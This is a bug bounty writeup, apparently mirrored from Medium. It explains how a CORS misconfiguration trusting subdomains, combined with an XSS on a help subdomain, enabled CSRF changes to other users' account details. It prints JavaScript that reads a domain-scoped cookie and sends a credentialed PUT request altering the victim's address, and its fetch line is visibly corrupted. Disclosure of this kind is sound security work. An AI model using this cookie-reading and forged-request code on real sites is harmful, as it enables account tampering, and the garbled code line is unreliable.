CORS to CSRF attack

medium.com · devanshbatham/Awesome-Bugbounty-Writeups · 17 hours ago · vulnerability
0 net
Tags
cors csrf
CORS To CSRF Attack | by Osama Avvan - Freedium Milestone: 20GB Reached We’ve reached 20GB of stored data — thank you for helping us grow! Patreon Ko-fi Liberapay Close < Go to the original CORS To CSRF Attack This writeup is about the CORS Misconfiguration by which I was able to perform a CSRF attack to change other users account Info. The… Osama Avvan Follow ~2 min read · June 27, 2019 (Updated: December 10, 2021) · Free: Yes This writeup is about the CORS Misconfiguration by which I was able to perform a CSRF attack to change other users account Info. The target let's just say it was named redact.com was sending a PUT request to the server for updating User Information like Address, Name, etc. An Origin Header was also sent in the request Origin: redact.com which was reflected in the Response and the Access-Control-Allow-Credentials was set to True. Which means that cookies can be sent along with the request. I tried to change the Origin Header value to evil.com and then redact.com.evil.com but both were rejected. But sending the Origin : evil . redact.com worked which means that sub domain of redact.com can send requests to its API. Now I needed an XSS on one of its subdomains to send the PUT request to the Server, luckily I got an XSS on help.redact.com. But it wasn't enough an enctyptedMembershipNumer param was sent along with the PUT request to identify the user. After looking into the Cookies of redact.com I found that the enctyptedMembershipNumer was saved in a cookie with a name prop_29 which was scoped to the . redact.com the dot, in the beginning , means that this cookie can be accessed from its subdomains. So to extract that Cookie I wrote a JS code. function getCookie(name) { var match = document.cookie.match(new RegExp('(^| )' + name + '=([^;]+)')); if (match) return match[2]; } Now the complete code to get the enctyptedMembershipNumer and to send the PUT request. function getCookie(name) { var match = document.cookie.match(new RegExp('(^| )' + name + '=([^;]+)')); if (match) return match[2]; } cook = getCookie("prop_29") data = {"member":{"mailingAddress":{"addressLineOne":"Account Hacked","city":"NEW Port","stateOrProvinceCode":"NY","postalCode":"20001","email":" [email protected] ","countryCode":"US"}}} fetch(` https://www.redact.com/api/node/vivaldi/v1/account/primary-contact?encryptedMembershipNumbe"=${"ook}` , {met"od: "PU"", credentails: "include", body: JSON.stringify(data)}) I created a JS file and uploaded the code on my server to use in the XSS payload. Final Payload: https://help.redact.com/app/answers/list?searchTerm= The . and // were removed from the Payload by the XSS filter so I converted them to their respective HTML entities. Thank You for Reading. 📝 Read this story later in Journal . 👩‍💻 Wake up every Sunday morning to the week's most noteworthy stories in Tech waiting in your inbox. Read the Noteworthy in Tech newsletter . #javascript #bug-bounty #bugcrowd #security-researchers Reporting a Problem Sometimes we have problems displaying some Medium posts. If you have a problem that some images aren't loading - try using VPN. Probably you have problem with access to Medium CDN (or fucking Cloudflare's bot detection algorithms are blocking you).
← Back to stories